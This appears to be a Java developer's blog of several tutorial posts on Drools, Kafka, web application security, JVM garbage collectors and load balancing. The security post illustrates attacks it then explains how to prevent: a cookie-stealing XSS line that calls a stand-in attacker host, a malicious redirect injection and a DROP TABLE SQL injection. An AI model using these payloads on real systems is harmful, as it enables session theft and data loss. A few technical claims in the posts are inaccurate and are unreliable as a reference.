Tech It Easy

Having been a Tech Professional since the last 17 years, primarily in Java, J2EE. I have decided to start this blog to share my insights into Tech. While focus would be primarily on Java and Java Enterprise. I would also be giving insights into other areas like Design Patterns,  Java Architecture, Database.  As well as insights into new areas like DevOps, Big Data etc.

My endeavor is to educate and inform people on Tech, in a way that is more simple and easy to understand. At the same time also act as a one stop source of information and knowledge.

Posted in Uncategorized | Leave a comment

Drools- Rule Engine

High-level View of a Rule Engine

One of the many features of AI, is Expert Systems, which uses Knowledge representation to codify knowledge into a knowledge base, that can be used for reasoning. Simply put, we can process data with this knowledge base to deduce the conclusion. What you are doing here is automating the reasoning and logic part of an application, or creating a template for the logic to be implemented. For eg , let us say we have an online shopping system,  which gives discounts based on the points you have accumulated as an user. Now typically we could code this logic manually and then run in the application. The problem is as the number of business rules for discounts increases, the effort increases, and maintainability ends up becoming an issue.  Now what if we had a ready made set of rules in the form of a template, that could be used by the application.  What this effectively means is instead of coding the rules in the application, we simply add it to the template, which in turn will be processed by application.

Drools is a Rule Engine that uses a rule based approach to implement an Expert System, and is more classified as a Production Rule System. The term Production Rule is described as a “set of rules that mathematically delineates a set of finite length strings over an alphabet”.  What Business Rule Management Systems do is build additional value on top of a general purpose Rule Engine by providing systems for rule creation, management, deployment etc. The Production Rule System is Turing complete, with a focus on knowledge representation to express propostional, first order logic in a non ambigous manner. The brain of a Production Rule System is the Inference Engine, which has the ability to scale to a large number of rules.  What Inference Engine does is to match the facts and data against the Production Rules or simply Rules.  Production Rule is a two part structure using First Order logic for reasoning.

Now consider an online shopping application, where discount is given for Aug 15, and the rates vary on the category,  Books- 10%, Toys-15%.  So typically a rule would be defined like.

When

Purchase_Date is Aug 15, 2017

Category is Books

Then

Offer Discount 10% on Price

When

Purchase_Date is Aug 15, 2017

Category is Toys

Then

Offer Discount 15% on Price

 

The process of matching new or existing facts against Production Rules is called Pattern Matching, which is done by Inference Engine. The Inference Engine uses a number of algorithms for Pattern Matching, like Linear, Rete, Treat, Leaps. Drools uses the Rete algorithm, in an implementation called ReteOO, signifying that it has an enhanced and optimized implementation of the algorithm for Object Oriented systems. Rules here are stored in Production Memory, while the Facts are stored in Production Memory.

If we consider above example, the Rule here is If Purchase Date is Aug 15, Category is Books, then Give Discount of 10%.  The facts are basically the POJO classes, that contain the data, in this case, an object like Order, which has Purchase Date, Category of Item,  that matches it to the Rules given.  Now with so many facts and rules, you have a scenario, where multiple rules could end up being true for the same fact assertion, resulting in a conflict. In such a scenario, we have an Agenda managing the execution order of these conflicting rules using a Conflict Resolution Strategy.

 

 

Posted in Drool, Rules Engine, Uncategorized | Tagged , , | Leave a comment

Apache Kafka- Messaging

We had a brief introduction to Apache Kafka in the previous post,  now we shall be looking at how Apache Kafka’s stream based model, fits in with a typical messaging system.

What is a messaging system?

The messaging system basically transfers data from one application to another, leaving the app free to focus only on the data, and not on how it is actually shared. What happens here is that messages are placed in a queue, asynchronously, between client applications and messaging system. Typically there are two kind of messaging patterns available one is the point to point or queing and the other one is publish-subscribe or pub-sub, the more used pattern.

point-to-point Messaging system

Typically in a point to point queuing model, all messages are persisted in a queue, you can have one or more consumers reading them. But a particular message can be consumed by one consumer only. The advantage here is that , the data processing can be divided over multiple consumer instances,  making scalability easier. The disadvantage is that queues cannot be accessed by multiple subscribers.

Publish-Subscribe Messaging system

The standard pub-sub model on the other hand allows you to broacast the record to multiple consumers or subscribers. The messages are persisted in a topic, and consumers can subscribe to one or more topics. However the disadvantage here is that you can’t scale processing, as the message goes to every subscriber.

Kafka combines the advantages of these two approaches in it’s consumer group model. The consumer group allows you to divide up processing over a collection of processes, effectively those in the group, much like the queuing point to point model. And it allows you to broadcast the messages to multiple consumer groups. Every topic in Kafka can be consumed by multiple subscribers, and it can be scaled too.

Ordering of Records

In the traditional queue model, records are retained in the order they are stored on the server, and when multiple consumers consume here, the records are handed out in the same order of storage. The problem though is that when records are delivered asynchronously to consumers,  they may arrive in a different order. There is a work around, by which messaging systems have the concept of an exclusive consumer, where only one process consumes from a queue, but then we would have to give up parallel processing for this.

Kafka gets around this by implementing partition within topics, which ensures ordering and load balancing over processes. The partitions in the topic are assigned to consumer instances in the group, so that each partition is consumed by exactly one consumer in the group. However we must ensure that number of instances in a consumer group, should not be more than the partitions.

Also Kafka has a pretty good in built storage system, the data is written to a disk and is replicated for fault tolerance. Write in Kafka is not considered complete, until there is a full back up and it’s guarenteed to persist even if server fails.

Kafka does not just read or write stream of data,  it also does real time processing of streams.  The stream processor in Kafka reads stream of data from input topics, processes it and produces stream of data to output topics. For eg a ticket booking application would read in booking requests from input topics and output a stream of booked tickets or reservations.  The advantage is that Kafka has it’s own Streams API, which implements stream processing. Streams API builds on the other core APIs of Kafka,  producer and consumer for input, stateful storage feature and group mechanism, replication for fault tolerance.

 

 

 

Posted in Apache, Apache Kafka, Uncategorized | Tagged , | Leave a comment

Apache Kafka- Introduction

What is Apache Kafka?

Kafka is basically an open source distributed streaming platform, which makes data integration between systems, much simpler. Stream here is the pipeline where applications continously receive data.  Kafka as a streaming platform has two main features.

  • Captures data streams or event streams which it feeds to other data systems like RDBMS or Key-Value stores or warehouses.
  • All the stream events are placed in an append only queue called log. As the data in log is immutable, continous, real time, processing is enabled.

In a way Kafka is similiar to a traditional messaging queue or enterprise messaging system, only here it does the same for streams of records. Also a better throughput, in built partitioning and fault tolerance make it a better solution for large scale message processing applications.

If we take a look at how Kafka works, producers send messages arbitrarily, which are stored in it.  What Kafka does here is to place these data in different partitions, which in turn are categorized into topics. Within each partition, you have multiple messages, indexed and stored, using a key, value and timestamp.  Processes called consumers then read the messages stored in partitions. Kafka in turn runs on a cluster of one or more servers, and partitions are distributed across cluster nodes.

Kafka has four major APIs.

  • Producer API- Allows application to publish a stream of records to one or more Kafka topics.
  • Consumer API- Allows application to subscribe to one or more topics, and process stream of records.
  • Streams API- Allows an application to act as a stream processor, consuming an input stream from one or more topics, and producing an output stream to one or more output topics.
  • Connector API- Executes the reusable consumer or producer APIs that can connect the topics to existing applications.

 

Before we explore Kafka, we need to have a basic idea about the terminologies used like topics, brokers.  The below diagram, illustrates it well

Fundamentals

The data is stored in topics, which are basically a stream of messages, belonging to a particular category or feed. These topics are multi subscriber, they can have zero to one consumers who subscribe to the data written to it. Each partition is basically an ordered immutable sequence of messages, and implemented as a set of segment files.  This sequence of messages is appended to a structured commit log. And each record or message in the partition, are given a sequential id called offset number.

Each partition has one server which is the “leader”, responsible for all the read and writes, and the nodes that passively replicate the leader are called followers. If the leader fails, one of the followers automatically becomes the new leader. Now a server can act as the leader for one partition, and follower for other partitions, making the load distribution easier.

All published records are retained by Kafka for a given period of time, after which it will be discarded to free up space. The consumer however has control over the offset number, by which it can read the records in any specific order it likes. Having partitions in a log, allow it to scale beyond a size, that will fit on a single server. And they also allow the topic to hold an arbitrary amount of data.

The published data in turn is maintained by brokers, and each broker may have zero or more partitions per topic. The brokers essentially are servers , with each handling data and requests for a share of the partition. Each partition here has  a replica, which is a backup to save from data loss. Now if say a partition has 5 topics and there are 5 brokers,each of them will have one partition. However in the scenario, that a partition has 5 topics, and there are more than 5 brokers, first 5 brokers will have one partition, but the remaining will not. A Kafka cluster contains multiple brokers, and it can be expanded without downtime. The clusters manage the persistence and replication of message data.

Producers publish messages to one or more Kafka topics, and also responsible for choosing which record to assign to which partition in which topic.  Consumers on the other hand, read the data or messages from the broker. They subscribe to one or more topics, and consume messages by pulling data from various brokers.

As we can see from the above diagram, consumers are typically divided into groups. Each record delivered to a topic, is delivered to one consumer instance within each group. These instances can be in separate processes or separate machines. If all instances are in the same group, records will be effectively load balanced. If they are in different groups, each record will be broadcast to all the processes.

 

Posted in Apache, Apache Kafka, Uncategorized | Tagged , | 1 Comment

Web Application Security

One of the biggest challenges in the web is security. Now when we speak of security it is something every one recognizes the need for, but really have not much idea on how to go about it. The standard perception of security is that you login with your credentials, the application or website authenticates it, and takes you to your home page. And yes there is authorization, where you are given access based on your role. Authentication and authorization though is a very basic look at web security, there is a much larger scope out there to be explored.

Problem is quantifying security or answering the question “how secure enough is your web application”. It is not possible to explore the entire security issue in a single article, what this post intends to do is have a broad look at some of the security risks and how to tackle them. Basically it has to do with a question of trust, do we trust integrity of data coming in from a browser? Do we trust connection between browser and user application can’t be tampered?

Validating Form Input

Basically when we are entering some data in a HTML form, we trust we are entering some valid data. This is due to the inbuilt form validations via Client Side Java Script or server side rules. But is the data we are entering in a form secure? NO.

Even if we are using HTTPS, and doing form validation, the data we are getting from a form is basically untrustworthy. User can use something like curl to submit false data or modify the markup. Or it could be untrustworthy data from a hostile website. Problem with malformed data is that there is every chance of unexpected behavior or data leaks. For eg we have the following code where user selects type of notification

final String notificationType=req.getParameter(“notification”);

if(notificationType.equals(“email”)

{

notifyEmail();

}

else

if(notificationType.equals(“SMS”)

{

notifySMS();

}

else

{

showError(“Select valid notification kind”);

}

How do we ensure that uncontrolled flow can be eliminated here? This is where form validation comes in. Invalid input data can violate business logic or trigger faults, even allow an attacker to take control. Input validation is often the first line of defense against this risk. Basically this is for values restricted within a particular range. For eg during a fund transfer, entering amount like -9000 makes no sense really. This form of input validation to ensure data is entered in the right format is called positive validation or white listing. But what to do when input fails validation?  For eg in the above example, if you are getting values other than SMS or Email, there is either a bug or an attack. Now say if you are provided with notificationType as “Chat” you may get an error message saying Chat is not a valid notification. But what if you have a notificationType like

new Image().src = ‘http://badguy.ratnakar.com/steal?’ + document.cookie

This is a more serious XSS reflective attack that steals session cookies, and you really can’t provide user feedback here.  One way is to filter <script> tag to get over. This strategy of rejecting input having known dangerous values is called negative validation or blacklisting. Problem is list of possible dangerous values in input, is very large and needs to be maintained. One way out is sanitization where instead of rejecting undesirable input, it simply filters it out. Again this is not particularly safe, as attacker could by pass it.

Most frameworks like Struts, Spring have built in input validation functionality, as well as in external libraries. The advantage here is that validation logic is pushed to the first layer of your web tier application, ensuring invalid data does not reach your application.

Encode HTML Output

Apart from input data, developers also need to look at the output too. If we take a standard web application it has HTML markup for structure, CSS for styling, Java Script for logic, and the user generated content from server side, which is rendered in a combined format. Browsers try rendering content even if it is malformed, which however is a major vulnerable point. And this risk becomes higher when you render data from an untrusted source. As we have seen earlier, what happens if we get input containing special characters like {}, <>,”. This is where output encoding comes in.

Basically it is the process of converting the output data to a final format. Problem is you might need to give a different codec, depending on how data is consumed. Without proper encoding, there is every chance of client getting misformatted data, that could be exploited by an attacker. For eg if say our PM himself is a customer to the site. In HTML it would be

<p> Narendra  Modi</p>

or rendering it as Narendra Modi.

But what happens if we get output like

document.getElementById(‘name’).innerText = ‘Narendra ‘Damodardas’ Modi //<–unescaped string

This is what we call as malformed JavaScript, which is what hackers look for too. Now if PM enters name as

Narendra ‘Damodar’ Modi ;window.location=’http://villian.gabbarsingh.com/&#8217;;

You are pushing the user to a hostile website, this is where you need to implement encoding strategies.

‘Narendra ‘Damodar’ Modi \’;window.location=\’http://villian.gabbarsingh.com/\’;

This is just one way of encoding using a \ character. Most frameworks have mechanisms for rendering content safely and filtering out reserved characters. With a plethora of frameworks and encoding contexts available, there are certain rules to be observed. Check the kind of encoding your framework does as well as a particular context. While you could handle encoding at rendering time, it often adds a lot of complexity to the code as also posting the data in a non HTML format.

Bind Parameters for Database Queries

Database is the most crucial part of a web application as it contains state can’t be easily restored. It also has sensitive information that needs to be protected. Whether you are using SQL or an ORM or a NoSQL database, you need to look at how input data is used in your queries. Let’s say I have this method for adding new students

void addStudent(String lastName, String firstName) {
String query = “INSERT INTO students (last_name, first_name) VALUES (‘”
+ lastName + “‘, ‘” + firstName + “‘)”;
getConnection().createStatement().execute(query);
}

Now if I am adding something like “Ratnakar” “Sadasyula”, SQL output would be

INSERT INTO students (last_name, first_name) VALUES (‘Sadasyula’, ‘Ratnakar’)

Now if input is something like

INSERT INTO students (last_name, first_name) VALUES (‘AAA’, ‘Bobby’); DROP TABLE Students;– ‘)

It actually ends up executing two commands, insert as well as Drop table Students.

This has ample scope for misuse including violating data integrity, exposing sensitive information.

A very simple approach to this issue is by parameter binding like below. This  separates executable code from content, transparency in handling. In a way this also helps in clean code and makes it more comprehensible.

void addStudent(String lastName, String firstName) {
PreparedStatement stmt = getConnection().prepareStatement(“INSERT INTO students (last_name, first_name) VALUES (?, ?)”);
stmt.setString(1, lastName);
stmt.setString(2, firstName);
stmt.execute();
}

For eg in JDBC it is always preferable to use parameter binding, than using String concatenation in binding. It is the same for Hibernate or JPA using SetParameter. In fact even if you are having a NoSQL database, it is still vulnerable to injection attack.

Protecting Data in Transit

So far we have been seeing only the input and output data, but what about the data in transit. If we are using a standard HTTP connection, the data transferred in plain text is vulnerable to misuse. In the transit between the browser and server, user can eavesdrop or tamper in what is called a man-in-the-middle attack. Open Wi Fi network like in airports or cafe, are especially very vulnerable. Either the ISP could inject ads into their traffic or could be used for surveillance.

HTTPS was used to secure sensitive web data, like say financial transactions, but now it has become a more default mode even in Social Networking sites. HTTPS protocol uses Transport Layer Security(TLS), to secure communications, which in fact is a successor to SSL(Secure Sockets Layer). It provides confidentiality and data integrity, as well as authenticating web site identity. Though it had some initial hurdles like expensive cost of hardware and only one web site certificate per IP address. Modern hardware has now made it cheaper. And protocol extension called SNI( Server Name Indication), has made it possible to get web certificates for multiple IP address. Also introduction of Free Certificate services like Let’s Encrypt has made it more widespread.

When we use TLS, a site provides identity using a public key certificate which contains information about the site, as well as the key that proves the site is the owner of the certificate, using a private key that only it knows. Generally a trusted 3rd party  called a Certificate Authority(CA) verifies the site’s identity, and grants a signed certificate to indicate it’s verified. This has different levels of certification offered, the most basic being Domain Validation( DV) which certifies certificate owner controls a domain. There are others like OrganizationValidation(OV) and ExtendedValidation(EV) doing additional checks.

You can configure your server to support HTTPS. But how do we make sure our site or application, is compatible with uses who might be using very old browsers, supporting much older protocols and algorithms. Supporting dated versions of protocols makes it very vulnerable to attack. Fortunately there are tools like Mozilla’s SSL Configuration Generator, that generate configurations for the web servers. Now generally a website has HTTPS for only some resources, say login page or confidential data.  Problem is if you use a normal HTTP request here, it is very susceptible to man-in-the-middle attack. We simply can’t shut down HTTP  network port here, as the browser usually redirects to HTTPS even when you type in HTTP.

However just redirecting requests is a risky approach by itself. To get over this , most browsers nowadays support a powerful feature called HSTS(HTTP Strict Transport Security), which allows a site to interact with a browser, only if interacts in HTTPS. Enabling HSTS, will automatically convert HTTP requests to HTTPS. Also setting secure flag in a cookie will instruct a browser to send it, only when using HTTPS. And this ensures safety of sensitive information. And finally you can also make use of SSL Labs SSL Server Test to perform a deep analysis of your configuration.

Protecting User Passwords

Passwords is one of the most vulnerable asset of your application. While storing user id and password in a database table is the most obvious way, it is not at all a recommended approach. While it does keep out invalid users, it is vulnerable in many other ways. Some one like an Application Developer or DBA, who has access to credentials can easily impersonate a user. Even otherwise storing a password in database with no cryptographic protection, makes it vulnerable to attack vectors.

One way of securing passwords is using a hashing technique. Use a cryptographic hashing algorithm to transform your password to an encrypted form. However this is hard to decrypt and recover. For eg if you have a password “helloworld”, and applying a Salting technique you get some hex result, that will be stored in database. Now if you want to validate,  apply same hashing algorithm to the password text and if it matches, it is valid.

The issue here though is multiple users use the same password “helloworld”, you will be having the same hash in database. An attacker can get hold of the password store and reverse engineer by cross referencing a look up table having your password hashes.

This is where we use “salt” techniques where some extra data is added to password before hashing. The advantage is two instances of a password won’t be having the same hash value. So if we have two passwords named “helloworld”, you can use salt string “ABCE” for one and “DFDGF” for another, ensuring you have two different hash values here. What you are doing here is storing the password with a hash, salt and work factor. So when you login here, the application uses salt again to generate a hash to do comparison with the one in database.

Authenticate Users

Authentication is basically validating a user while logging into an application. Authorization is defining what a user is supposed to do. For eg if you log into a banking application, you can check your balance statement, but cannot modify it. Authorization and authentication is combined in session management.  What Session Management does is to relate requests to a particular user, so that a user does not have to authenticate during each request. What happens is once a user is authenticated, their identity is tied to a session for subsequent requests.

One concern is how to ensure credentials are private when sent over a network. Preferably the easiest way is to use HTTPS for all requests. One way is having a login form, where user enters credentials and is validated in database. We can also authenticate uses using a PIN or a mobile code. One of the more convenient options is SSO(Single Sign On), where users can log in using a single identity. For eg you can log into any site, using your Google credentials. Here SSO relies on external service to manage the logging in. At times a single factor of authentication like user and password may not be enough. In this case you can use a TFA( Two Factor Authentication), this could be secret code sent to your mobile phone or a hard ware token. For eg in an online shopping or travel web site, a secret code is sent to user’s mobile to validate. Also in the event of user giving an invalid password, it is better to send an email link to reset password, than showing an error message. Most frameworks have authentication mechanisms that support a variety of schemes, the best examples being Apache Shiro, Spring Security.

Protecting User Sessions

HTTP being stateless has no in built mechanism for relating user data across requests, which is why we use sessions. Now sessions are a vulnerable target for attacks, say some one hijacks authenticated sessions, they can effectively bypass authentication. One way is to use an existing framework to handle session management. Sessions are typically created using a session identifier inside a cookie, sent by a user’s browser. Now if an attacker can manage to get hold of a session id, they can hijack the entire session. For eg if a session id for a cookie follows a particular sequence say AAA243HH and AAA3484KK, attacker can guess the base encoding and decode to get the values.

In order to get over this ,its better to have a session id of minimum 128 bits generated using a secure pseudorandom number generator. Some implementations put user information inside of a cookie to bypass looking up in a data store. However unless implemented with care, this could actually lead to more problems. If you do need to store in a cookie, do not store confidential data like user id, password and limit the length. Also do not expose session identifiers in a URL, as they can be exposed to 3rd party who in turn would use it for their own ends.

In case you are using cookies, some simple precautions have to be undertaken to make sure they are not unintentionally exposed. There are 4 attributes here, Domain restricts scope of a cookie to a particular domain, Path to a path and subpaths. You need to ensure that Path and Domain are as restrictive as possible. Secure flag indicates browser should send cookie only when using HTTPS. HttpOnly flag indicates cookie should not be accessible by JavaScript or any client side scripts. So it could be something like

Set-Cookie: sessionId=[FDJ5435JJJ]; path=/mybooks/; secure; HttpOnly;
domain=mybooks.ratnakar.com

Another way to reduce risk is effective management of session lifecycle. There is a chance that attacker to set session id to a less privileged session for eg in a hidden form field. This is an attack called session fixation. Two ways to tackle this issue, create a new session either when user authenticates or moves to a higher privilege level. And next we create session id ourselves. Also we put session timeouts, to ensure that the session does not take too much time for an attacker to break in. This again depends, for eg on Facebook, it might have a longer time out. On the other hand for your net banking application it might time out after just 10 minutes.

Authorize Actions

We have seen that Authorization is used to enforce permissions to the user of what and what not to access. Authorize must always be done on the server, for eg hiding the delete button on a page for a user is always risky. Client should never pass authorization information to the server, rather it should pass only temporary information like session ids. By default it should deny any action to the user, unless explicitly allowed.

Generally speaking you have two kinds of authorization, global permissions and resource level permissions. For global it is generally straightforward, as it applies across to all resources. For eg if I need to shutdown the server, could be something like

public String shutdown(User callingUser) {
if (callingUser != null && callingUser.hasPermission(Permission.SHUTDOWN)) {
doShutdown();
return “SUCCESS”;
} else {
return “PERMISSION_DENIED”;
}
}

Resource validation on the other hand is more complex, as it validates if an actor can act on a particular resource. For eg a User has the right to modify only their own profile, not others.

If we take the entire process, it would be as follows

  • An actor becomes a principal after authentication.
  • Policy specifies what action the principal can take against a resource.
  • If Policy allows the action, the only execute.

Most common form of authorization is RBAC( Role Based Access Control), users are given roles, which in turn are assigned permissions. For eg an Admin has permission to delete users, we implement the code in such a way, only they can perform the action. Here we are linking role to the action instead of user identity. In this way, whoever is the Admin can delete the users.

But what if some admins have only privilege to add and modify users but can’t delete them.  In such a case, it would be more appropriate to go with permission based access control, instead of just roles. So here we map user identity to the permissions. Basically Role Based Access is used if you have a fixed set of permissions, and there is not a large permutation of user permissions.

However if it has a more advanced security level, that can’t be handled with just RBAC, would be better to go for Attribute Based Access Control( ABAC). For eg, I want to grant permissions based on user’s job description or country.  It might be a case where I want admins in India to read and update the user list, but admins in China can only read the list. Or admins can’t delete users on a national holiday or weekend. You can make use of XACML here, a format defined by OASIS. ABAC can be used when permissions are highly dynamic, and access control is sensitive enough to factor in the various control flows.

Other approaches that can be considered are

MAC-Mandatory Access Control, centrally managed policy, that can’t be overridden based on subject attributes.

REBAC- Relationship Based Access Control, policy determined by relationship between principals and resources.

DAC- Discretionary Access Control, that specifies owner managed access control.

And finally some standard precautions

  • Always set the Cache Control header to “private no-cache no-store” for resources to ensure your server side authorization code is called always.
  • Reduce duplication of authorization logic.

 

 

 

 

Posted in Application Security | Tagged | Leave a comment

Java Garbage Collectors

We had earlier explored Garbage Collection and it’s basic concepts in our previous post. One thing we need to understand straight up, is that JVM does not have one single type of garbage collector. It has four different ones, each with it’s own advantages and disadvantages.  What to use ultimately depends  on the application you are using. These 4 collectors though have a common feature, they are generational in nature. Which basically means they split the managed heap into different segments. Now let us examine each of the Collector types one by one.

Serial Collector

The simplest one, mainly for single threaded environments( 32 bit Windows) or small heaps. Basically it freezes all application threads when doing the garbage collection. And that means it’s suitable only for stand alone applications. You can never use it in a server side environment.  This can be turned on by using -XX:+UseSerialGC JVM  argument.

Parallel( Throughput) Collector

Default collector for JVM,  it’s  biggest advantage is that it uses multiple threads to scan through the heap and compact it. The problem is that whenever it is doing a minor or full GC collection, it will stop all the threads, pausing the application. Basically if you have an application, where it’s ok to have a pause time or you want to optimize using lower CPU overhead, go for it.

CMS Collector

Conncurrent Mark Sweep collector as the name indicates, uses multiple threads at a time( concurrent) to “mark” the heap for unused objects which can be recycled(sweep). It goes into a Stop The World mode only in two cases. When initializing the initial marking of roots, ie objects in old generation reachable from thread entry points. Or the application has changed the heap state, while algorithm was running concurrently, forcing it to do some final touches and ensure right objects are marked.

How does this work?

Coming to your next question, when we speak of Mark and Sweep, there are two parts here. As the name suggests Mark is when unused objects are marked out for deletion. By default Mark status of every new object is set to false(0). Now all reachable objects are set to Mark status true(1). What this algorithm does is a depth first search approach. Here every object is considered as a node, and all nodes( objects) reachable from this node are visited. This continues till all reachable nodes are visited.

In Sweep phase, all those objects whose marked value is false are deleted from the memory heap. And all other reachable objects are marked as false. This process is run again to release any marked objects. It is also called as a tracing garbage collector, as the entire collection of objects directly or indirectly accessible is traced out.

The major problem with this is that it could encounter a promotional failure, where a race condition occurs between the young and old generations. Basically, what happens here is the collector has failed to make space to promote objects from young to old. That effectively means it first has to create the space, which ends up creating a Stop the World condition, that it was meant to avoid in the first place. To avoid this issue, either increase size of old generation or the entire heap or allocate more background threads to the collector.

Also it uses more CPU to provide a higher throughput, using multiple threads to perform scanning and collection. This can be used for server applications, which have to be constantly running and can’t afford a pause. The algorithm can be activated by XX:+USeParNewGC to enable it.

G1 Collector

Introduced in Java 7, this was designed to support heap memory larger than 4 GB. This uses multiple background threads to scan through heap, dividing it into various regions. It begins by scanning the region with the maximum number of garbage objects, accounts for it’s name G1( Garbage First). This can be enabled using the –XX:+UseG1GC flag.

There is every good chance of heap being cleared before the background threads have finished scanning unused objects. And in such cases we could encounter a Stop the World scenario, with collector stopping the application, till scanning is done. Another advantage G1 has is that compacts the heap, on  the go, the CMS collector does this only during full Stop the World collection.

G1 Collector String deduplication

Since strings take up most of the heap along with the internal char[] arrays, a new optimization has been made in Java 8. This enables G1 collector to identify strings duplicated across the heap and make them point to the same internal char[] array. This can be enabled using -XX:+UseStringDeduplicationJVM argument and ensures multiple copies of same string are avoided in the heap.

Another improvement in Java 8 is removal of permgen part of heap. This space was meant for class meta data, static variables, interned strings. For larger applications it was imperative to optimize and tune this portion of the heap, and more often than not it resulted in OutOfMemory exception. With JVM itself taking care of this functionality, it would go a long way in improving the performance.

 

Posted in Garbage Collection, JVM | Tagged , | Leave a comment

Garbage Collection in Java

Garbage Collection is basically the process of allocation and de allocation of memory space for objects. In the case of Java, it is handled by the JVM itself, and the developer need not worry about writing the code for it, unlike C or C++.  To understand how Garbage Collection works in Java, we need to understand certain basic features of JVM, Memory Management.

JVM or Java Virtual Machine is basically an abstract computing machine, that translates the code into the machine language, which in turn enables the programs to be platform independent.  Each JVM implementation could vary in the way Garbage Collection is implemented. Oracle previously had Rockit JVM, and after it took over Sun, it uses the Hotspot JVM in addition to Rockit.

JVM-Architecture

Now if we take a look at the standard Hotspot JVM architecture, we see there are two main components related to Garbage collection. The Garbage collector itself and the heap memory. Basically heap is where all the objects are stored at run time, while Stack contains the local variables and references to the object. Once an object is not referenced any more, it is evicted from the heap memory. What essentially happens in Garbage Collection is that objects are evicted from heap and the space is reclaimed.

Java-Heap-Memory

Now if we take Heap Memory, there are 3 major areas, as seen in the above diagram- Young Generation, Old Generation and Permanent Generation.

Now when we take the Young Generation, it is further sub divided into 3 regions.

Eden- Space where any object enters the runtime memory area.

S0 Survivor Space- Objects are moved from Eden to S0, and similiarly from S0 to S1 Survivor Space.

Objects in Survivor Space are moved to Tenured region, while Permanent Generation contains meta information of the classes, methods. However this Perm Gen space is removed in Java 8.

Now let us take a look at how the Garbage Collection process actually works.  Every new object that is created is first stored in the Eden space in young generation of Heap Memory Area.

Now when the Minor Garbage Collection begins, all live objects( those that are still referenced) are moved from Eden to S0. And similarly all live objects in S0 are moved to S1. Basically all the live objects here are set aside.  Those objects which are not live( not referenced) are the ones marked for garbage collection. Depending on the kind of garbage collector, the marked objects will be removed in one go or it will be carried in a separate process.

Now coming to Old Generation, all live objects in S1 are promoted to old generation space. And the dereferenced objects in S1 are marked for garbage collection. This is the last phase in instance life cycle with respect to Java GC. Here begins the Major Garbage Collection, that scans the old generation part of heap and marks all the dereferenced instances here.

So what happens is once all the de-referenced instances are removed from the heap memory, the location becomes empty and available for future objects. These blank spaces are fragmented by default, across the memory area, and it’s advisable to go for defragmentation for quicker memory allocation. Again based on the type of Garbage Collector, reclaimed memory will either be compacted dynamically or in a separate phase of GC.

Just before an object is removed from memory, Java GC, invokes the finalize() method of respective instance to free up any resources held by it. There is no specific order or time here in invoking finalize, before freeing up memory. The garbage collection is done by a daemon thread.

When is an object eligible for garbage collection?

Basically Java has different references for an object that determine the eligibility for removal.

Strong Reference- Not eligible for Garbage Collection

Soft Reference- Garbage collection possible, but only as a last option.

Weak and Phantom Reference indicates Garbage Collection is possible.

The compiler can choose to free objects earlier in an application if it sees no use for them in future. For eg an object created in a method, and used by that only, can be freed by compiler by setting it’s value to null. This is often used for optimization. There could be an added complexity, if the object has properties in the register and there is every chance that those values could be used in future. But still the instance would be marked for garbage collection.

 

 

 

 

Posted in Garbage Collection | Tagged , | 1 Comment

Load Balancing Schemes

The concept of Load Balancing is that tasks or requests are distributed on to multiple computers. For eg, I make a standard HTTP request from a client to access a web application, it gets directed to multiple web servers. What basically happens here is the application’s work load is distributed among multiple computers, making it more scalable. It also helps in providing redundancy, so let’s say one server fails in a cluster, the load balancer distributes the load among the remaining servers. However when an error happens, and the request is moved from a failing server to a functional server it is called as “failover”.

Cluster is typically a set of servers running the same application and it’s purpose is two fold. To distribute the load onto different servers and provide redundancy/failover mechanism.

What are the common load balancing schemes?

Even Task Distribution Scheme

Also called as “Round Robin” here the tasks are evenly distributed between the servers in a cluster.Here each task is evenly distributed to a server. It works basically when all servers have the same capacity, and all tasks need the same amount of effort. The issue here though is that this methodology does not consider that each task, could have a different effort to be processed. So you could have a situation, where let’s say all servers are given 3 Tasks- T1, T2 and T3. On the face of it seems equal, however T1,T2 on Server 1 needs more effort to process, than T1,T2 on Server 2,3. So in effect Server 1 is bearing a heavier load here, than Server 2 and 3, inspite of an even distribution.

DNS Based Load Balancing

Here you ensure the DNS, is configured to return different IP addresses, when an IP address is requested for your domain name. It is almost similar to the Round Robin scheme, except that computers here cache the IP address, and keep referring to it, until a new look up is made. However it is not really a recommended approach, and it is more advisable to use a load balancer software.

Weighted Task Distribution Scheme

As the name indicates, the tasks here are distributed in a relative ratio to other servers. It works if all servers in a cluster don’t have the same capacity. Assume we have 3 servers, and one of the server’s capacity is 1/2 of the other two servers. Now assume that there are 10 tasks to be distributed among the servers. In this case both Server 1, 2 would get 10 tasks, however since Server 3 has only 1/2 of the capacity, it would be getting only 5 tasks. So here the task distribution is done as per server capacity, relative to the other server. However this still does not consider the processing capability of each task.

Sticky Session Scheme

So far in the previous load balancing schemes, we have made the assumption that any incoming request is independent of the other requests. Let us consider a typical Java Web Application, where a request arrives at Server 1, and some values are written into session state. Now the same user makes another request, which is sent to Server 2, you could have a scenario, where it is unable to get the session data, as it is stored in Server 1.

Typical scenario, user logs in, enters credentials, is validated and taken to home page. Now the first request the user makes, we store the user id and password in a session on Server 1, as that would be needed across the application. Now the next request from user, say to navigate from home page to a registration page, is sent to Server 2. Here we would be needing the user credentials, which however is stored in a session State on Server 1. So we end up with a scenario, where the request could not be getting the session data.

This can be resolved using Sticky Session load balancing, where instead of distributing the tasks among servers, we distribute the sessions instead. So basically all tasks by the same user in a session are sent to the same server to prevent loss of data. For eg if we have a Shopping Cart application, the entire session( User Logs In-> Home page->Selects Items-> Pay Bill) will be distributed to one server per user. This in turn could result in an uneven distribution of work load, as some sessions could have more tasks compared to others.

Even Size Task Queue Distribution Scheme

This is similar to the Weighted Task distribution, however instead of just routing all the tasks to a server at once, they are kept in a queue. So assuming 10 tasks are to be distributed to each server, they are kept in a queue. These queues contain the tasks that are being processed by the server or going to be processed. Whenever a task is over, it is removed from the queue for that server.

Here we ensure that each server queue has the same amount of tasks in progress. Servers with higher capacity finish the tasks faster, ensuring space for remaining tasks. Here we are taking into consideration the capacity of the server, as well as the effort needed to process each task. Any new task, is sent to server whose queue has fewer tasks lined up. In the event of a server being overloaded, it’s queue size becomes larger than task queues of other servers. And this overloaded server does not have any new tasks assigned to it, until it’s queue is cleared.

Posted in Load Balancing | Tagged | Leave a comment